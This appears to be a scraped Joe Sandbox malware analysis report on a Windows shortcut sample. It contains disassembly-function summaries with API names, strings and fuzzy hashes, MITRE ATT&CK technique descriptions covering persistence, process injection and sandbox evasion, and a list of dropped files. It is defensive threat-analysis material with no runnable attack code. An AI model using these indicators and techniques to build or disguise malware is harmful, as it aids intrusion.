Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast
String ID: FTP response aborted due to select/poll error: %d$FTP response timeout
API String ID: 1452528299-4057338436
Opcode ID: b3680c69f4103d06cdb494d06b04e548c44e47966c3d69dd6a1734b33940d799
Instruction ID: 05effd478d3c0f2a8b5fe58a02139f492a107a4554f915a935a661bb3eac92af
Opcode Fuzzy Hash: b3680c69f4103d06cdb494d06b04e548c44e47966c3d69dd6a1734b33940d799
Instruction Fuzzy Hash: 8731D222A0874741FB60AA15A5047BAF3B4BF487D4F844135DE6E476D1DFBCE442C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DBDD40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DBDE3C
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DBDE91

Strings

%s%s%s%s, xrefs: 00007FF7F1DBDE24

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_lstrncpy
String ID: %s%s%s%s
API String ID: 342294800-8588819
Opcode ID: 7f5fea3136a66fe7532ffc373e6dea4b775f4afa8c4c71feff21b29ebe72a818
Instruction ID: bc2d16d624e677c3cdf19ead471285ed454da899e4945e052346134405eb82b2
Opcode Fuzzy Hash: 7f5fea3136a66fe7532ffc373e6dea4b775f4afa8c4c71feff21b29ebe72a818
Instruction Fuzzy Hash: 4A418421A0CB4692FF19EB54E9402F5A374AF55B89FC40036D96E037E5CFBCE65583A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB22F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FF7F1DB23EE
WSAGetLastError.WS2_32 ref: 00007FF7F1DB2400

Part of subcall function 00007FF7F1DAE9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAE9E3
Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9EB
Part of subcall function 00007FF7F1DAE9C8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9FB
Part of subcall function 00007FF7F1DAE9C8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEA05
Part of subcall function 00007FF7F1DAE9C8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAEA18
Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAA8
Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAB3
Part of subcall function 00007FF7F1DAE9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEABC
Part of subcall function 00007FF7F1DAE9C8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEAC8

Strings

Recv failure: %s, xrefs: 00007FF7F1DB2426

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast$_errno$__sys_errlist__sys_nerrrecvstrncpy
String ID: Recv failure: %s
API String ID: 3259516395-4276829032
Opcode ID: 61635ef880cd3c250adacd9e3ce8806d2dce6ae5576a84bf7028612a48018187
Instruction ID: 94fe784321576b5b7d7d91b795278ee6b582756b0d68d865dfecb264970f49f0
Opcode Fuzzy Hash: 61635ef880cd3c250adacd9e3ce8806d2dce6ae5576a84bf7028612a48018187
Instruction Fuzzy Hash: 25419362B1568556EB68EF25E9847B9A360BB58BD5F800235DE2E073D5DFBCE0408350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA3160 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DA328E

Strings

"%s":, xrefs: 00007FF7F1DA3265
"%s":null, xrefs: 00007FF7F1DA31D4

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: fputs
String ID: "%s":$"%s":null
API String ID: 1795875747-2759546026
Opcode ID: d1e8b2cbe847eca540a1cdc3be6f99a325edfe1b31fa93f6ff44665a7c6de3bf
Instruction ID: 0049c207d9b78b90955594c540da0d3cb3f6be1c33947876775d751f5590a26d
Opcode Fuzzy Hash: d1e8b2cbe847eca540a1cdc3be6f99a325edfe1b31fa93f6ff44665a7c6de3bf
Instruction Fuzzy Hash: 8C417E21E08642A6FB50EB15D4843B8A3B2AB41784FD88936DA2D477D6DFBCF540C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD6550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DD6596

Strings

Failure sending QUIT command: %s, xrefs: 00007FF7F1DD65A9
QUIT, xrefs: 00007FF7F1DD6585

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: Failure sending QUIT command: %s$QUIT
API String ID: 1488884202-1162443993
Opcode ID: 8fb780ae27e66ea40ae6cdaa932904c1ed908f10f4f3a2aae22a017b08eb9cd8
Instruction ID: 169c8caa371a587b0b9bf8e8e7e13d5a6ceba2d036380c5ed16132bc5030c395
Opcode Fuzzy Hash: 8fb780ae27e66ea40ae6cdaa932904c1ed908f10f4f3a2aae22a017b08eb9cd8
Instruction Fuzzy Hash: F8313021E0C68681EB54EB21D4543B9B7B0FB44BC9F884135DA2E4B6D5CFADF094C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DDB2CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DDB352

Strings

%c%03d, xrefs: 00007FF7F1DDB321
%s %s, xrefs: 00007FF7F1DDB370

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: %c%03d$%s %s
API String ID: 1488884202-883683383
Opcode ID: e71c8f3416955dffc2b1ae4ce8438465774fe2bbeb44d7f70f04729b0a7ea59a
Instruction ID: 570eb575d9f43c49f7abde5de1c900c4f526dc4d258808de2ce196aff4da5d02
Opcode Fuzzy Hash: e71c8f3416955dffc2b1ae4ce8438465774fe2bbeb44d7f70f04729b0a7ea59a
Instruction Fuzzy Hash: F7212673B14A8986D748DF29E80079C6764E785BC4F989031DE1C4BB94DF38E952CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC5634 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 00007FF7F1DC5685
inet_pton.WS2_32 ref: 00007FF7F1DC56A4

Strings

::1, xrefs: 00007FF7F1DC5695

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: htonsinet_pton
String ID: ::1
API String ID: 3877577928-2731173655
Opcode ID: bc949e856f714609933df4177a66192dda2d0ee264670633a2d5a2a51a43343a
Instruction ID: 02107344455e37b7a540a23f78bd9ca89c02c162b3f69b664f193a4371044f0b
Opcode Fuzzy Hash: bc949e856f714609933df4177a66192dda2d0ee264670633a2d5a2a51a43343a
Instruction Fuzzy Hash: 80310433918B85C6E704DF20E440369B3B0FB58B49F948235EA5D4B694DFBDE191CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB3AF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

getsockopt.WS2_32 ref: 00007FF7F1DB3B67
setsockopt.WS2_32 ref: 00007FF7F1DB3B96

Part of subcall function 00007FF7F1DA3968: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DA399D
Part of subcall function 00007FF7F1DA3968: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DA39AD

Strings

@, xrefs: 00007FF7F1DB3B04

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: AddressHandleModuleProcgetsockoptsetsockopt
String ID: @
API String ID: 1224256098-2726393805
Opcode ID: 5f442fb243eeb454093095dbadaed06eb23a4c4b725bf5fe417a39eceb628cc1
Instruction ID: 997566fa20b9d762ff318318b7a652848134893e5a0cad97523f3f1f12d67d79
Opcode Fuzzy Hash: 5f442fb243eeb454093095dbadaed06eb23a4c4b725bf5fe417a39eceb628cc1
Instruction Fuzzy Hash: A0119E71A0C642A7F320EF14E444366F7B0FB84345F940134EA9A466E9DBFDD544CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DCD590 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DCD5B7

Strings

AUTH %s %s, xrefs: 00007FF7F1DCD5AB
AUTH %s, xrefs: 00007FF7F1DCD5C1

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: AUTH %s$AUTH %s %s
API String ID: 1488884202-306427787
Opcode ID: b9c67204038dda0fd5d669baa53048a35a4c7edabb4fc997b8899f6f7eaac06f
Instruction ID: 6419d21a397dc55cc4ca5e592e1df9decb1688801a5960cb292131e99498ce39
Opcode Fuzzy Hash: b9c67204038dda0fd5d669baa53048a35a4c7edabb4fc997b8899f6f7eaac06f
Instruction Fuzzy Hash: 7DE08CA1E09B5181EF44B74898013A85370AF147C9FD0803ACA5D123E1DF7CE2A5C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DEC51C Relevance: 5.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F1DEC509,?,?,?,?,00007FF7F1DEC2FD,?,?,?,?,00007FF7F1DEBAE6), ref: 00007FF7F1DEC53B
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F1DEC509,?,?,?,?,00007FF7F1DEC2FD,?,?,?,?,00007FF7F1DEBAE6), ref: 00007FF7F1DEC5C2

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: c41bca59b6dd596f70c16ed48ea2d7c7a1d9c565bfa0111b8186407d51e17b50
Instruction ID: 666bd12c26028b3ca8fa6aeeb4dc33c41653270c5d2ceb3c41c445ee69703566
Opcode Fuzzy Hash: c41bca59b6dd596f70c16ed48ea2d7c7a1d9c565bfa0111b8186407d51e17b50
Instruction Fuzzy Hash: C5113D61E1D70246FB6CB7219840179A2A1AF44BE2FD88634D93E173D5DFACF84187E1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA2B5C Relevance: 5.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7F1D9B6E1), ref: 00007FF7F1DA2BAB
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7F1D9B6E1), ref: 00007FF7F1DA2BC2
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7F1D9B6E1), ref: 00007FF7F1DA2BE3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA2BF4

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 6ff657cb843d304aaa61e28a697a6e84686e4a2c000e04354a40c192b77be9a1
Instruction ID: b7dabcaea21dbd9d9efadb7c893dff8fa79c6163e27d86b480c43cac8284f7a5
Opcode Fuzzy Hash: 6ff657cb843d304aaa61e28a697a6e84686e4a2c000e04354a40c192b77be9a1
Instruction Fuzzy Hash: AD118E32A15A4186EB14EF12E184378B370FB84B84F544635CB2D4B7ADDFB8E461D390

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report knfV5IVjEV.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Other

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\GSlLzFnTov\GSlLzFnTov.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbsi0lfi.m4s.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izk42yes.vps.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltnleziw.dj4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4mfwfxv.t0x.ps1

C:\Users\user\Desktop\knfV5IVjEV

